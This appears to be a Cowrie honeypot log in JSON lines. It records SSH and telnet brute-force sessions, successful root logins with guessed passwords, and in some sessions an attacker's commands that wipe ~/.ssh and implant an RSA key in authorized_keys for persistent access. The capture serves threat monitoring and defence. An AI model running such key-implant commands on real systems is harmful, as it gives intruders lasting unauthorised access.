{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:15:37.351878Z","src_ip":"14.103.112.104","session":"71c90ab84b8b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:15:38.904238Z","src_ip":"14.103.112.104","session":"71c90ab84b8b"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:15:40.089382Z","src_ip":"14.103.112.104","session":"71c90ab84b8b"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":41478,"dst_ip":"1.2.3.4","dst_port":22,"session":"b59e0938b4c4","protocol":"ssh","message":"New connection: 14.103.112.104:41478 (1.2.3.4:22) [session: b59e0938b4c4]","sensor":"my-vps","timestamp":"2025-09-09T05:15:40.281807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:15:40.282823Z","src_ip":"14.103.112.104","session":"b59e0938b4c4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:15:40.469927Z","src_ip":"14.103.112.104","session":"b59e0938b4c4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:15:42.071196Z","src_ip":"14.103.112.104","session":"b59e0938b4c4"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:15:42.255012Z","src_ip":"14.103.112.104","session":"5cf0314f7aa0"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:15:42.264108Z","src_ip":"14.103.112.104","session":"b59e0938b4c4"}
{"eventid":"cowrie.session.connect","src_ip":"216.16.128.182","src_port":39497,"dst_ip":"1.2.3.4","dst_port":23,"session":"c664a04e21b7","protocol":"telnet","message":"New connection: 216.16.128.182:39497 (1.2.3.4:23) [session: c664a04e21b7]","sensor":"my-vps","timestamp":"2025-09-09T05:16:03.908930Z"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":47702,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f28972a5f85","protocol":"ssh","message":"New connection: 14.103.112.104:47702 (1.2.3.4:22) [session: 7f28972a5f85]","sensor":"my-vps","timestamp":"2025-09-09T05:16:10.234154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:16:10.237444Z","src_ip":"14.103.112.104","session":"7f28972a5f85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:16:10.424758Z","src_ip":"14.103.112.104","session":"7f28972a5f85"}
{"eventid":"cowrie.login.success","username":"root","password":"zxc123456789","message":"login attempt [root/zxc123456789] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:16:11.668260Z","src_ip":"14.103.112.104","session":"7f28972a5f85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:16:12.522726Z","src_ip":"14.103.112.104","session":"7f28972a5f85"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:16:12.523571Z","src_ip":"14.103.112.104","session":"7f28972a5f85"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:16:12.524933Z","src_ip":"14.103.112.104","session":"7f28972a5f85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:16:12.717520Z","src_ip":"14.103.112.104","session":"7f28972a5f85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:16:13.194426Z","src_ip":"14.103.112.104","session":"7f28972a5f85"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:16:13.195123Z","src_ip":"14.103.112.104","session":"7f28972a5f85"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:16:14.330426Z","src_ip":"14.103.112.104","session":"7f28972a5f85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:16:14.331393Z","src_ip":"14.103.112.104","session":"7f28972a5f85"}
{"eventid":"cowrie.session.closed","duration":13.247175693511963,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:16:17.156037Z","src_ip":"216.16.128.182","session":"c664a04e21b7"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":39314,"dst_ip":"1.2.3.4","dst_port":22,"session":"191f6d529ba0","protocol":"ssh","message":"New connection: 14.103.112.104:39314 (1.2.3.4:22) [session: 191f6d529ba0]","sensor":"my-vps","timestamp":"2025-09-09T05:16:22.679695Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:16:22.681378Z","src_ip":"14.103.112.104","session":"191f6d529ba0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:16:22.891255Z","src_ip":"14.103.112.104","session":"191f6d529ba0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:16:23.729611Z","src_ip":"14.103.112.104","session":"191f6d529ba0"}
{"eventid":"cowrie.session.closed","duration":"14.2","message":"Connection lost after 14.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:16:24.414216Z","src_ip":"14.103.112.104","session":"7f28972a5f85"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:16:24.422864Z","src_ip":"14.103.112.104","session":"191f6d529ba0"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":42116,"dst_ip":"1.2.3.4","dst_port":22,"session":"134c3620a4b5","protocol":"ssh","message":"New connection: 14.103.112.104:42116 (1.2.3.4:22) [session: 134c3620a4b5]","sensor":"my-vps","timestamp":"2025-09-09T05:16:46.592846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:16:46.593727Z","src_ip":"14.103.112.104","session":"134c3620a4b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:16:46.784492Z","src_ip":"14.103.112.104","session":"134c3620a4b5"}
{"eventid":"cowrie.login.success","username":"root","password":"master123","message":"login attempt [root/master123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:16:47.589345Z","src_ip":"14.103.112.104","session":"134c3620a4b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:16:48.034826Z","src_ip":"14.103.112.104","session":"134c3620a4b5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:16:48.035529Z","src_ip":"14.103.112.104","session":"134c3620a4b5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:16:48.036567Z","src_ip":"14.103.112.104","session":"134c3620a4b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:16:49.089185Z","src_ip":"14.103.112.104","session":"134c3620a4b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:16:49.297136Z","src_ip":"14.103.112.104","session":"134c3620a4b5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:16:49.297881Z","src_ip":"14.103.112.104","session":"134c3620a4b5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:16:49.492959Z","src_ip":"14.103.112.104","session":"134c3620a4b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:16:49.493822Z","src_ip":"14.103.112.104","session":"134c3620a4b5"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":42122,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b07ab293c04","protocol":"ssh","message":"New connection: 14.103.112.104:42122 (1.2.3.4:22) [session: 3b07ab293c04]","sensor":"my-vps","timestamp":"2025-09-09T05:16:49.697185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:16:49.698094Z","src_ip":"14.103.112.104","session":"3b07ab293c04"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:16:49.898504Z","src_ip":"14.103.112.104","session":"3b07ab293c04"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:16:52.749861Z","src_ip":"14.103.112.104","session":"3b07ab293c04"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":53760,"dst_ip":"1.2.3.4","dst_port":22,"session":"332efe3325d5","protocol":"ssh","message":"New connection: 14.103.112.104:53760 (1.2.3.4:22) [session: 332efe3325d5]","sensor":"my-vps","timestamp":"2025-09-09T05:16:54.148204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:16:54.150754Z","src_ip":"14.103.112.104","session":"332efe3325d5"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:16:54.564421Z","src_ip":"14.103.112.104","session":"3b07ab293c04"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:16:55.178104Z","src_ip":"14.103.112.104","session":"332efe3325d5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:16:55.770975Z","src_ip":"14.103.112.104","session":"332efe3325d5"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:16:55.962219Z","src_ip":"14.103.112.104","session":"134c3620a4b5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:16:55.969372Z","src_ip":"14.103.112.104","session":"332efe3325d5"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":53698,"dst_ip":"1.2.3.4","dst_port":22,"session":"59372137847a","protocol":"ssh","message":"New connection: 92.118.39.62:53698 (1.2.3.4:22) [session: 59372137847a]","sensor":"my-vps","timestamp":"2025-09-09T05:17:09.811515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:17:09.812275Z","src_ip":"92.118.39.62","session":"59372137847a"}
